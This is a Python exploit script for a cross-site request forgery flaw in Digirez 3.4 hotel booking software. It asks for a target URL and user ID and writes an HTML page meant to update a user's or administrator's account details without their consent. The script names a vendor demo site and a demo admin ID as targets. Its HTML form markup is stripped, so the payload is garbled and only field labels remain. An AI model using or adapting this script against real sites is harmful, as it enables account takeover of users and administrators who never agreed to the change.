#!/usr/local/bin/python # # # # # # Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin) # Dork: N/A # Date: 18.09.2017 # Vendor Homepage: http://www.digiappz.com/ # Software Link: http://www.digiappz.com/index.asp # Demo: http://www.digiappz.com/room/index.asp # Version: 3.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') def csrfexploit(): e_baslik = ''' ################################################################################ ______ _______ ___ _ __ _____ _______ ___________ _ __ / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ WWW.IHSAN.NET ihsan[@]ihsan.net + Digirez 3.4 - CSRF (Update Admin) ################################################################################ ''' print e_baslik url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: ")) id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ") csrfhtmlcode = '''

User Update
Choose Login*
Choose Password*
First Name*
Last Name*
Email*
Address 1
Address 2
City / Town
ZIP / Postcode
State / County
Country
Phone Number
Fax
Status

''' %(url, id) print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print("") csrfexploit()